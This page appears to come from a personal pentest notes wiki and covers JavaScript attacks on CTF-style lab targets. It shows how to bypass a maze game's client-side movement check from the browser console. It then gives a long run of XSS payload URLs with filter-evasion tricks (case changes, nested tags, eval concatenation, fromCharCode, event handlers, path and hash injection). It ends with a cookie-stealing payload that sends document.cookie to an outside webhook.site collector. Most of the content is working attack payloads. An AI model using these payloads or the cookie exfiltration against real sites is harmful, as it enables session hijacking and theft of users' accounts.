Pentest
  • Homepage
  • Pentest Links
  • 01 Prep
    • Target Inventory
    • OSINT and Dorks
    • Recon-ng dns zone snoop
    • ❤️Gitbook
  • 02 Scan
    • *Favorites
    • Burp
    • Dirb nikto wpscan etc
    • Enum Finger and Brute SSH
    • Fuzzing
    • Nmap
    • Open Port Checks OneLiner
    • Port Knocking
    • SSL Issues
    • Tcpdump
  • 03 Getting In
    • Char Evasion Tricks
    • Email SMTP
    • Eternal Blue
    • FTP
    • heartbleed
    • Metasploit
    • MySql
    • NFS
    • Oracle
    • Postgres
    • PowerShell Empire
    • Shells
    • rpc
    • SMB Samba
    • SSH Tips
    • SQLite3
    • Veil
  • 04 WebApps
    • Apache
    • Blogs
    • Coldfusion
    • Content Management (CMS)
    • Drupal
    • Elastix FreePBX
    • HttpFileServer (HFS)
    • IIS
    • IIS6 WebDav
    • Local File Inclusion (LFI)
    • Magento
    • Nagios
    • PFSense
    • php
    • php type juggling
    • phpLite
    • Web Injections
    • Javascript
    • Shellshock
    • SQL Injections (sqli)
    • SQLMap
    • WAF
    • Webmin
    • Web Scrape
    • Wordpress
  • 05 Passwords & Ciphers
    • Cipher Decrypt
    • Cipher RSA Wiener P-Q-E
    • Cracking
    • Dict Guess List Mangle
    • Get Hashes
    • Hydra Brutes
    • Images Exif Steg
    • Malware Analysis
    • Pull Hashes PCredz
    • SSH PrivKey Passphrase
    • Unzip Crack
    • Windows PW
  • 06 Linux PrivEsc
    • 1 Look Around
    • 2 Enums
    • 3 PrivEsc
    • 4 Kernel Exploits
    • 5 Looting
    • binaries
    • Buffer Overflow
    • bash prison
    • Monitor Files
    • mongodb node
    • Pivots
    • Remote Execute
    • Shell TTY Fix
    • TAR backups
    • Transfer Files
    • vnc
  • 07 Windows PrivEsc
    • 1 Windows cmd kungfu
    • 2 Enums
    • 3 PrivEsc
    • 4 Kernel Exploits
    • 5 Looting
    • Bloodhound
    • DLL Hijack MSF
    • Kerberos
    • Memory Analysis
    • NTDS
    • Powershell
    • Responder
    • Saved Creds runas
Powered by GitBook
On this page
  • Webpage 'Maze' challenge
  • XSS

Was this helpful?

  1. 04 WebApps

Javascript

Webpage 'Maze' challenge

  • Inspect Elements

  • Inspecter > Script > View the JavaScript

  • Write an updated Function (similar to the original) that doesnt do a rule-check

function canMoveTo(destX, destY) {
   var imgData = context.getImageData(destX, destY, 15, 15);
   var data = imgData.data;
   var canMove = 1; // 1 means: the rectangle can move
   return canMove;
}

  • Console Tab > Paste your 'function' there, and click 'run'!

  • Now you can move anywhere you want!

XSS

  • Javascript Injections (also: WebInjections)

  • Goal is to pop an alert

  • Tricks to Avoid filters that might:

    • Block 'script' but not 'sCript'

    • Trim <script> but not recursive <sc<script>ript>

    • Blacklisted but can still create an error that Pops

    • Block 'alert' but can concat using 'eval'

    • Block 'alert' but allow String fromCharCode

    • Inject new JavaSript using 'Inspect Elements'

    • Mistake in code allows us to trust index.php

--------------------
http://abc.so/index.php?name=hack
http://abc.so/index.php?name=hack<script>
http://abc.so/index.php?name=hack<script></script>
http://abc.so/index.php?name=hack<h1>TEST</h1>
http://abc.so/index.php?name=hack<script>alert(1)</script>
http://abc.so/index.php?name=hack<script>alert('flag')</script>

--------------------
http://abc.so/index.php?name=hack%3Cscript%3Ealert(%27flag%27)%3C/script%3E
http://abc.so/index.php?name=hack<sc<script>ript>alert('flag')</sc</script>ript>

--------------------
http://abc.so/index.php?name=hack<a href='javascript:alert(1)'>test</a>
http://abc.so/index.php?name=hack<a onmouseover='alert(1)'>test</a>
http://abc.so/index.php?name=hack<img src="zzz.jpg" onerror='alert('flag')'></img>
http://abc.so/index.php?name=hack%3Cimg%20src=%22zzz.jpg%22%20onerror=%27alert(flag)%27%3E%3C/img%3E

--------------------
http://abc.so/index.php?name=hack<script>eval("al"+"ert(flag)")</script> 
http://abc.so/index.php?name=hack<script>eval("al"%2b"ert(flag)")</script>

String.fromCharCode(97,108,101,114,116,40,49,41)  ..."alert(1)"

--------------------
Inspect Elements
Inject an alert into the existing javascript!
<div class="row">
<div class="col-lg-12">
<h1>XSS</h1>
 <p>Welcome!
 <script>
 var $a= "hacker";
 </script>
 </p>

http://abc.so/index.php?name=";alert(1);var a="        ..works
http://abc.so/index.php?name=";alert(1);"              ..works
http://abc.so/index.php?name=";alert('flag');"         ..works

--------------------
http://abc.so/index.php?name=";alert('flag');"         ..err
http://abc.so/index.php?name=';alert('flag');'         ..works
http://abc.so/index.php?name=%27;alert(%27flag%27);%27 ..win!

--------------------
Mistake in the code is trusting index.php
So we send index.php/somethingelse  .. at the end, to fire a script!
http://abc.so/index.php/hello"><script>alert(1)</script>
http://abc.so/index.php/hello%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://abcl.so/index.php/hello"><script>alert('flag')<script>

--------------------
decodeURIComponent
Browsers have this issue fixed (used to work often)
http://abc.so/index.php#hacker
http://abc.so/index.php#<script>alert(1)</script>
http://abc.so/index.php#<script>alert('flag')</script>

--------------------
Cookie Grab Flag
http://abc.so/index.php?name=hack
http://abc.so/index.php?name=<script>alert(1)</script>   ..ok
<img srv="https://myserver/?c=COOKIE" />                 ..want this cookie
<script>document.write('<img srv="https://myserver/?c='+document.cookie+'" />')</script>
http://abc.so/index.php?name=<script>document.write('<img src="https://myserver/?c='%2bdocument.cookie%2b'" />')</script>
http://abc.so/index.php?name=<script>document.write('<img src="http://webhook.site/6d4c04c4-07a3-4892-8bb3-78f27c7d5aff/?c='%2bdocument.cookie%2b'" />')</script>
http://webhook.site/6d4c04c4-07a3-4892-8bb3-78f27c7d5aff
http://webhook.site/6d4c04c4-07a3-4892-8bb3-78f27c7d5aff?c=SECRET%3flag
PreviousWeb InjectionsNextShellshock

Last updated 2 years ago

Was this helpful?